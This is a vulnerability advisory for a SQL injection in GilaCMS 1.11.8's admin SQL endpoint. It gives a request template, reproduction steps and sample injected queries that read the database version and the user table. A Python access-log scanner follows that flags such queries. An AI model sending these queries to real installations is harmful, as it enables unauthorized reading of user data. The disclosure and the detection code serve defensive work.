CVE-2020-5515: GilaCMS 1.11.8 – ‘/admin/sql?query=’ SQL Injection
Gila CMS 1.11.8 allows /admin/sql?query= SQL Injection.
Product Owner: GilaCMS
Application Name: GilaCMS 1.11.8
CVE ID: CVE-2020-5515
Type: Installable/Customer-Controlled Application
Application Release Date: 4th December, 2019
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: SQL Injection in ‘/admin/sql?query=’
Vulnerability Explanation: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Verified In:
Firefox 71.0 (64-bit)
Windows 10
Hosted using XAMPP v3.2.4
Request:
GET /gilacms/admin/sql?query={INJECTION_POINT} HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GSESSIONID=1za7iusvgawzjs936iegtmmtwfghbbp6ectnugwb0clvc0z37u
Upgrade-Insecure-Requests: 1
Steps to Reproduce:
1. Log in to the GilaCMS application as admin.
2. Visit the following page: http://localhost/gilacms/admin/sql
3. Click on ‘Show Tables’. It takes us to http://localhost/gilacms/admin/sql?query=SHOW%20TABLES
4. The ‘query’ parameter is vulnerable to SQL injection (inline queries), for example:
http://localhost/gilacms/admin/sql?query=SELECT VERSION(),USER()
http://localhost/gilacms/admin/sql?query=SELECT * FROM user
Vulnerable Code:
The ‘query’ parameter sent in the GET request (http://localhost/gilacms/admin/sql) is vulnerable to SQL Injection.
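Because the endpoint runs whatever arrives in the ‘query’ parameter, the practical defensive control is to watch access logs for it: any statement other than the ones the admin UI itself issues (the ‘Show Tables’ button in the steps above) is someone typing SQL through the web tier. The following is an added example, not code from the advisory or from the Gila project. It parses a few constructed Apache-style log lines that mirror the requests shown above, URL-decodes the parameter, and labels each request; the UI_QUERIES and SENSITIVE_TABLES sets are assumptions to be replaced with a baseline from your own deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined"-style format (not real traffic);
# the paths mirror the requests shown in the advisory.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Dec/2019:10:01:02 +0000] "GET /gilacms/admin/sql HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Dec/2019:10:01:05 +0000] "GET /gilacms/admin/sql?query=SHOW%20TABLES HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Dec/2019:10:01:09 +0000] "GET /gilacms/admin/sql?query=SELECT%20VERSION(),USER() HTTP/1.1" 200 640 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Dec/2019:10:01:15 +0000] "GET /gilacms/admin/sql?query=SELECT%20*%20FROM%20user HTTP/1.1" 200 8190 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Dec/2019:10:02:00 +0000] "GET /gilacms/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Statements the admin UI issues on its own through this endpoint. Only
# "SHOW TABLES" is documented in the advisory; the set is an assumption,
# extend it from a baseline of your own normal traffic.
UI_QUERIES = {"SHOW TABLES"}

# Assumption: tables whose reads through this endpoint deserve a higher severity.
SENSITIVE_TABLES = {"user"}


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_query(target):
    """Return the decoded SQL text from a /admin/sql request, or None otherwise."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/sql"):
        return None
    values = parse_qs(parts.query).get("query")
    if not values:
        return None
    # Collapse whitespace so "SHOW%20TABLES" and "SHOW  TABLES" compare equal.
    return " ".join(values[0].split())


def classify(query):
    """Label a decoded query: 'ui-action', 'sensitive-read' or 'ad-hoc-sql'."""
    upper = query.upper()
    if upper in UI_QUERIES:
        return "ui-action"
    m = re.search(r"\bFROM\s+`?(\w+)`?", upper)
    if m and m.group(1).lower() in SENSITIVE_TABLES:
        return "sensitive-read"
    return "ad-hoc-sql"


def scan(log_text):
    """Return one finding per /admin/sql request that carries a query parameter."""
    findings = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        query = extract_query(fields["target"])
        if query is None:
            continue
        findings.append({
            "ip": fields["ip"],
            "ts": fields["ts"],
            "query": query,
            "verdict": classify(query),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['verdict']:<15} {f['query']}")
```

Run against the sample, the first request (no parameter) and the index.php line are ignored, ‘SHOW TABLES’ is labelled as a UI action, the version/user probe as ad-hoc SQL, and the read of the user table as a sensitive read. In a real deployment the ad-hoc and sensitive verdicts are the ones to alert on, since the endpoint requires an admin session and such queries indicate either an operator bypassing the application or a stolen admin cookie being used to pull data.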
Reference:
Website: https://gilacms.com/
GitHub Repository: https://github.com/GilaCMS/gila
Download Version: https://github.com/GilaCMS/gila/releases/tag/1.11.8